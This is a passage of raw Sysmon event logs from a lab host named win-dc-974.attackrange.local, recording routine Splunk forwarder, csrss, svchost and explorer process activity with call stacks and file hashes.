22:53:09.395{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7055-603D-4888-00000000AD01}4368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.395{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7055-603D-4888-00000000AD01}4368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.396{05ADC7E1-7055-603D-4888-00000000AD01}4368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:10.950{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4ED8A9992AFEB47E1E6F0CD64B2D24,SHA256=B35C53C18EE654B65AE4F943F1D4B92AA04738D0079ED712968A7B4D232D4E01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:10.598{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9FF0926FE1AD4F3A1FBE24EC7233779,SHA256=936037DE37977752E60D8C30380A6F87648CD63EB57A735D2A41D36921C5AC59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.652{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.652{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.646{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001695340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.596{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55112-false10.0.1.12-8000- 23542300x80000000000000001695367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=436FEBCAE877A43ACCD1227803929E1A,SHA256=7A272D698DEF133674432CC6FA6F54BA78165F350A15DB87020209C9FB7046D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.989{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FB7DBD6E4EAEE08DAE427E06C8430289,SHA256=1D87352B9DFF733B4582C5067B19D6566BEDA44973AAC17970BF8332825D9574,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7058-603D-4A88-00000000AD01}9180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-7058-603D-4A88-00000000AD01}9180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.864{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7058-603D-4A88-00000000AD01}9180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.865{05ADC7E1-7058-603D-4A88-00000000AD01}9180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.504{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C41B5B5D0A0F51656E798B1BB131995B,SHA256=E30BFAE24F25C2398272BE20025695925318BCB2E4877E95E8E89AC5A3B153B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.379{05ADC7E1-7058-603D-4988-00000000AD01}43564436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7058-603D-4988-00000000AD01}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7058-603D-4988-00000000AD01}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.192{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7058-603D-4988-00000000AD01}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.193{05ADC7E1-7058-603D-4988-00000000AD01}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.004{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=606B4042B594E191B626A9E8A64A8614,SHA256=8644410664EE6969165FB9B17997CC026DA6CC9DEE8D906E7036459119A97EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.895{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 